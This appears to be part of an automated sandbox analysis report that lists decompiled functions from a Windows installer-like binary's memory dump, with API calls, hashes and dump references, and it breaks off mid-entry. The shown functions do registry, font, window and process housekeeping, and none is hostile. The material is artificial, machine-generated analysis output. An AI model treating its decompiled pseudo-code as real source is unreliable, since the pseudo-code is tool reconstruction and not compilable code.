                                                                    0x0046a255
                                                                    0x0046a258
                                                                    0x0046a25d
                                                                    0x0046a25e
                                                                    0x0046a268
                                                                    0x0046a269
                                                                    0x0046a26d
                                                                    0x0046a276
                                                                    0x0046a281

                                                                    APIs
                                                                    • FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
                                                                    • LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
                                                                    • SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
                                                                    • LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    • Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                                    • Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
                                                                    • Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                                    • Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00610040, Relevance: 6.0, APIs: 4, Instructions: 48registrywindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E00610040(void* __eax, void* __ecx, void* __edx) {
				void* _v16;
				int _t13;
				void* _t20;
				void* _t26;
				void* _t27;

				_push(__ecx);
				_t27 = __edx;
				_t26 = __eax;
				if(__ecx == 0) {
					_t20 = 0x80000002;
				} else {
					_t20 = 0x80000001;
				}
				if(E005C7A14(0,  *((intOrPtr*)(0x6ccfc0 + (E005C77E8() & 0x0000007f) * 4)), _t20,  &_v16, 2, 0) == 0) {
					RegDeleteValueW(_v16, E0040B278(_t26));
					RegCloseKey(_v16);
				}
				_t13 = RemoveFontResourceW(E0040B278(_t27));
				if(_t13 != 0) {
					_t13 = SendNotifyMessageW(0xffff, 0x1d, 0, 0);
				}
				return _t13;
			}








                                                                    0x00610043
                                                                    0x00610044
                                                                    0x00610046
                                                                    0x0061004a
                                                                    0x00610053
                                                                    0x0061004c
                                                                    0x0061004c
                                                                    0x0061004c
                                                                    0x0061007b
                                                                    0x0061008a
                                                                    0x00610093
                                                                    0x00610093
                                                                    0x006100a0
                                                                    0x006100a7
                                                                    0x006100b4
                                                                    0x006100b4
                                                                    0x006100bd

                                                                    APIs
                                                                    • RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,?,?,?,?,0062AC8F), ref: 0061008A
                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,?,?,0062AC8F), ref: 00610093
                                                                    • RemoveFontResourceW.GDI32(00000000), ref: 006100A0
                                                                    • SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 006100B4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseDeleteFontMessageNotifyRemoveResourceSendValue
                                                                    • String ID:
                                                                    • API String ID: 261542597-0
                                                                    • Opcode ID: 77a4b43a7585b641cb4056c657f18fe2b74d7f9113a8b954b3ed7bedb6d61676
                                                                    • Instruction ID: 1dce9f2b70afa6587215b720e4c7b57155893329b24cac9d33cbe1fd09ddcff8
                                                                    • Opcode Fuzzy Hash: 77a4b43a7585b641cb4056c657f18fe2b74d7f9113a8b954b3ed7bedb6d61676
                                                                    • Instruction Fuzzy Hash: B2F0C87674430567EA20B6B65C4BFEF128E8FC9745F24492EBA04EB282D668DC814369
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 87%
                                                                    			E0050E958(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x6d5648; // 0x0
					if(GlobalFindAtomW(E0040B278(_t5)) !=  *0x6d5642) {
						_t15 = E0050E924(_t12, _t13);
					} else {
						_t15 = GetPropW(_t12,  *0x6d5642 & 0x0000ffff);
					}
				}
				return _t15;
			}







                                                                    0x0050e958
                                                                    0x0050e95a
                                                                    0x0050e95b
                                                                    0x0050e95d
                                                                    0x0050e961
                                                                    0x0050e978
                                                                    0x0050e98f
                                                                    0x0050e9aa
                                                                    0x0050e991
                                                                    0x0050e99f
                                                                    0x0050e99f
                                                                    0x0050e98f
                                                                    0x0050e9b1

                                                                    APIs
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                                    • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                                    • GetPropW.USER32 ref: 0050E99A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                    • String ID:
                                                                    • API String ID: 2582817389-0
                                                                    • Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                                    • Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
                                                                    • Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                                    • Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006A5D88, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006A5D88() {
				long _v8;
				void _v12;
				void* _v16;
				void* _t16;
				HANDLE* _t17;

				_t17 =  &_v12;
				_t16 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8, _t17) != 0) {
					_v12 = 0;
					if(GetTokenInformation(_v16, 0x12,  &_v12, 4,  &_v8) != 0) {
						_t16 = _v16;
					}
					CloseHandle( *_t17);
				}
				return _t16;
			}








                                                                    0x006a5d89
                                                                    0x006a5d8c
                                                                    0x006a5d9e
                                                                    0x006a5da2
                                                                    0x006a5dc0
                                                                    0x006a5dc2
                                                                    0x006a5dc2
                                                                    0x006a5dca
                                                                    0x006a5dca
                                                                    0x006a5dd5

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                    • String ID:
                                                                    • API String ID: 215268677-0
                                                                    • Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                                    • Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
                                                                    • Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                                    • Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F5548, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004F5548() {
				signed char _v28;
				void* _t4;
				signed int _t8;
				struct HDC__* _t9;
				struct tagTEXTMETRICW* _t10;

				_t8 = 1;
				_t9 = GetDC(0);
				if(_t9 != 0) {
					_t4 =  *0x6d54b0; // 0x58a00b4
					if(SelectObject(_t9, _t4) != 0 && GetTextMetricsW(_t9, _t10) != 0) {
						_t8 = _v28 & 0x000000ff;
					}
					ReleaseDC(0, _t9);
				}
				return _t8;
			}








                                                                    0x004f554d
                                                                    0x004f5556
                                                                    0x004f555a
                                                                    0x004f555c
                                                                    0x004f556a
                                                                    0x004f5577
                                                                    0x004f5577
                                                                    0x004f557f
                                                                    0x004f557f
                                                                    0x004f558b

                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 004F5551
                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
                                                                    • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
                                                                    • ReleaseDC.USER32 ref: 004F557F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                    • String ID:
                                                                    • API String ID: 2013942131-0
                                                                    • Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                                    • Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
                                                                    • Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                                    • Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B72C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E006B72C2(void* __ecx, void* __esi, void* __fp0) {
				void* _t21;
				intOrPtr* _t27;
				intOrPtr* _t33;
				void* _t41;
				intOrPtr _t43;
				char _t46;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t59;
				void* _t60;
				void* _t61;
				intOrPtr _t62;
				void* _t67;

				_t67 = __fp0;
				_t60 = __esi;
				_t47 = __ecx;
				if(( *(_t61 - 9) & 0x00000001) != 0) {
					L3:
					_t46 = 1;
				} else {
					_t64 =  *(_t61 - 9) & 0x00000040;
					if(( *(_t61 - 9) & 0x00000040) != 0) {
						goto L3;
					} else {
						_t46 = 0;
					}
				}
				_t21 = E006A5DD8(_t46, _t47, 0, _t64, _t67);
				_t65 = _t21;
				if(_t21 != 0) {
					_t27 =  *0x6cdec4; // 0x6d579c
					SetWindowPos( *( *_t27 + 0x188), 0, 0, 0, 0, 0, 0x97);
					_push(_t61);
					_push(0x6b736d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t62;
					_t33 =  *0x6cdec4; // 0x6d579c
					 *((intOrPtr*)(_t61 - 0x18)) =  *((intOrPtr*)( *_t33 + 0x188));
					 *((char*)(_t61 - 0x14)) = 0;
					E004244F8(L"/INITPROCWND=$%x ", 0, _t61 - 0x18, _t61 - 0x10);
					_push(_t61 - 0x10);
					E005C6E90(_t61 - 0x1c, _t46, _t60, _t65);
					_pop(_t41);
					E0040B470(_t41,  *((intOrPtr*)(_t61 - 0x1c)));
					_t43 =  *0x6d68d0; // 0x0
					E006A60E8(_t43, _t46, 0x6cd884,  *((intOrPtr*)(_t61 - 0x10)), _t60, _t65, _t67);
					_pop(_t59);
					 *[fs:eax] = _t59;
					 *((char*)(_t61 - 1)) = 1;
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E006B73CE);
				E0040A1C8(_t61 - 0x1c);
				return E0040A1C8(_t61 - 0x10);
			}
















                                                                    0x006b72c2
                                                                    0x006b72c2
                                                                    0x006b72c2
                                                                    0x006b72c6
                                                                    0x006b72d2
                                                                    0x006b72d2
                                                                    0x006b72c8
                                                                    0x006b72c8
                                                                    0x006b72cc
                                                                    0x00000000
                                                                    0x006b72ce
                                                                    0x006b72ce
                                                                    0x006b72ce
                                                                    0x006b72cc
                                                                    0x006b72d8
                                                                    0x006b72dd
                                                                    0x006b72df
                                                                    0x006b72f4
                                                                    0x006b7302
                                                                    0x006b7309
                                                                    0x006b730a
                                                                    0x006b730f
                                                                    0x006b7312
                                                                    0x006b7319
                                                                    0x006b7326
                                                                    0x006b7329
                                                                    0x006b7337
                                                                    0x006b733f
                                                                    0x006b7343
                                                                    0x006b734b
                                                                    0x006b734c
                                                                    0x006b7359
                                                                    0x006b735e
                                                                    0x006b7365
                                                                    0x006b7368
                                                                    0x006b73a5
                                                                    0x006b73a5
                                                                    0x006b73ab
                                                                    0x006b73ae
                                                                    0x006b73b1
                                                                    0x006b73b9
                                                                    0x006b73c6

                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window
                                                                    • String ID: /INITPROCWND=$%x $@
                                                                    • API String ID: 2353593579-4169826103
                                                                    • Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                                    • Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
                                                                    • Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                                    • Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00435608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 66%
                                                                    			E00435608(signed short* __eax, void* __ebx, void* __edx) {
				signed short* _v8;
				char _v16;
				char _v24;
				void* _t23;
				intOrPtr _t31;
				void* _t32;
				void* _t34;

				_t23 = __edx;
				_v8 = __eax;
				_t2 =  &_v24; // 0x435946
				L0042F03C();
				 *[fs:eax] = _t34 + 0xffffffec;
				_t4 =  &_v24; // 0x435946
				E00430ED4( *((intOrPtr*)( *((intOrPtr*)( *0x6cdffc))))(_v8, 0x400, 0, 8,  *[fs:eax], 0x435674, _t34, _t2, __ebx, _t32), 8,  *_v8 & 0x0000ffff);
				_t6 =  &_v16; // 0x43596b
				E0040A61C(_t23,  *_t6);
				_t31 = _t4;
				 *[fs:eax] = _t31;
				_push(E0043567B);
				_t7 =  &_v24; // 0x435946
				return L00431164(_t7);
			}










                                                                    0x0043560f
                                                                    0x00435611
                                                                    0x00435614
                                                                    0x00435618
                                                                    0x00435628
                                                                    0x00435638
                                                                    0x0043564f
                                                                    0x00435656
                                                                    0x00435659
                                                                    0x00435660
                                                                    0x00435663
                                                                    0x00435666
                                                                    0x0043566b
                                                                    0x00435673

                                                                    APIs
                                                                    • VariantInit.OLEAUT32(FYC), ref: 00435618
                                                                      • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocInitStringVariant
                                                                    • String ID: FYC$kYC
                                                                    • API String ID: 4010818693-1629163012
                                                                    • Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                                    • Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
                                                                    • Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                                    • Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8CAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E006B8CAC(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t1;
				int _t9;
				void* _t12;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t18;
				intOrPtr _t20;

				_t15 = __edx;
				if( *0x6d68e5 != 0) {
					E00616130(L"Detected restart. Removing temporary directory.", _t12, _t17, _t18);
					_push(0x6b8ce7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t20;
					E006ACE20();
					E006ACB10(_t12, _t15, _t17, _t18);
					_pop(_t16);
					 *[fs:eax] = _t16;
					E00615560();
					_t9 =  *0x6cd884; // 0x1
					return TerminateProcess(GetCurrentProcess(), _t9);
				}
				return _t1;
			}















                                                                    0x006b8cac
                                                                    0x006b8cb9
                                                                    0x006b8cc0
                                                                    0x006b8cc8
                                                                    0x006b8ccd
                                                                    0x006b8cd0
                                                                    0x006b8cd3
                                                                    0x006b8cd8
                                                                    0x006b8cdf
                                                                    0x006b8ce2
                                                                    0x006b8cf6
                                                                    0x006b8cfb
                                                                    0x00000000
                                                                    0x006b8d07
                                                                    0x006b8d10

                                                                    APIs
                                                                      • Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                                      • Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58
                                                                      • Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F
                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07
                                                                    Strings
                                                                    • Detected restart. Removing temporary directory., xrefs: 006B8CBB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                    • API String ID: 1717587489-3199836293
                                                                    • Opcode ID: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                                    • Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
                                                                    • Opcode Fuzzy Hash: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                                    • Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C8790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 62%
                                                                    			E005C8790(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t9;
				void* _t11;
				intOrPtr* _t12;
				void* _t14;
				void* _t15;

				_t14 = __edx;
				_t15 = __eax;
				E005C8820(__eax, __eflags);
				_t12 = E00414020(_t11, _t15, GetModuleHandleW(L"user32.dll"), L"ShutdownBlockReasonCreate");
				if(_t12 == 0) {
					__eflags = 0;
					return 0;
				}
				_t9 =  *_t12(_t15, E0040B278(_t14));
				asm("sbb eax, eax");
				return _t9 + 1;
			}










                                                                    0x005c8793
                                                                    0x005c8795
                                                                    0x005c8799
                                                                    0x005c87b3
                                                                    0x005c87b7
                                                                    0x005c87cc
                                                                    0x00000000
                                                                    0x005c87cc
                                                                    0x005c87c2
                                                                    0x005c87c7
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8
